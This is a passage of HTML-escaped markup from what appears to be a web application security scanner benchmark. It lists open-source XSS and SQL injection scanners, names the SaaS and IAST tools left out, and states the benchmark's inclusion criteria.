&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/rabbit-vs/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Rabbit
VS&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/spacemonkey/&quot;&gt;&lt;b&gt;&lt;i&gt;Spacemonkey&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/kayra/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Kayra&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/2gwvs/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;2gwvs&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/webarmy/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Webarmy&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/springenwerk/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;springenwerk&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/mopest/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Mopset
2&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://ha.ckers.org/blog/20060921/xssfuzz-released/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;XSSFuzz 1.1&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/witchxtool-v10/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Witchxtoolv&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/php-injector/&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;PHP-Injector&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.whiteacid.org/xss_assistant.user.js&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;XSS Assistant&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-hansi-theme-font: major-bidi;&quot;&gt;Fiddler &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;a href=&quot;http://www.autosectools.com/Page/Fiddler-XSS-Inspector-Overview&quot;&gt;&lt;b&gt;XSSInspector&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-hansi-theme-font: major-bidi;&quot;&gt;/&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/xsrfinspector/&quot;&gt;&lt;b&gt;XSRFInspector&lt;/b&gt;&lt;/a&gt;&lt;b&gt;
Plugins&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://www.gnucitizen.org/blog/javascript-xss-scanner/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;GNUCitizen JAVASCRIPT XSS SCANNER&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Vulnerability Scanner 1.0 (by cmiN, RST)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following &lt;b&gt;&lt;i&gt;is a partial list&lt;/i&gt;&lt;/b&gt; of SAAS scanners
were &lt;b&gt;&lt;i&gt;not included&lt;/i&gt; &lt;/b&gt;in the benchmark, mainly due to time
restrictions, but might be included in future benchmarks:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;SAAS Online Scanning Services&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Appscan On Demand (IBM), Click To Secure, Sentinel
(WhiteHat), Veracode (Veracode), &lt;a href=&quot;http://www.quatrashield.com/RiskAssessment/ApplicationVulnerabilityScanner/Features.aspx&quot;&gt;Quatrashield&lt;/a&gt;, &lt;a href=&quot;http://www.veracode.com/products/dynamic&quot; target=&quot;_blank&quot;&gt;Veracode Dynamic Analysis&lt;/a&gt;, &lt;a href=&quot;https://www.edgescan.com/&quot; target=&quot;_blank&quot;&gt;edgescan&lt;/a&gt;, VUPEN Web Application Security Scanner (VUPEN Security), WebInspect (online
service - HP), WebScanService (Elanize KG), Gamascan (GAMASEC – currently
offline), Cloud Penetrator (Secpoint), &amp;nbsp;Zero Day Scan, DomXSS Scanner, Golem
Technologies, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Web Application Testing Tools which are using Dynamic
Runtime Analysis&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt; &lt;u&gt;(IAST):&lt;/u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;a href=&quot;http://www.quotium.com/prod/security.php&quot;&gt;Seeker&lt;/a&gt;
(Quotium)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;a href=&quot;http://pic.dhe.ibm.com/infocenter/asehelp/v8r8m0/index.jsp?topic=%2Fcom.ibm.ase.help.doc%2Ftopics%2Fc_GlassBoxScanning.html&quot;&gt;Appscan
Glassbox&lt;/a&gt; (IBM)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;a href=&quot;http://www1.contrastsecurity.com/&quot; target=&quot;_blank&quot;&gt;Contrast&lt;/a&gt;&amp;nbsp;(Contrast Security)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)PuzlBox &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(currently
named &lt;/span&gt;&lt;a href=&quot;http://www.autosectools.com/Software&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;PHP Vulnerability Hunter&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/inspathx/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Inspathx&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The benchmark focused on web application scanners that are
able to detect at least Reflected XSS or SQL Injection vulnerabilities, can be
locally installed, and are also able to scan multiple URLs in the same
execution.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;As a result, the test &lt;b&gt;did not include&lt;/b&gt; the following
types of tools:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Scanners without RXSS / SQLi detection features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;:&lt;/span&gt;&lt;/u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/dominator/downloads/list&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Dominator&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(Firefox Plugin)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
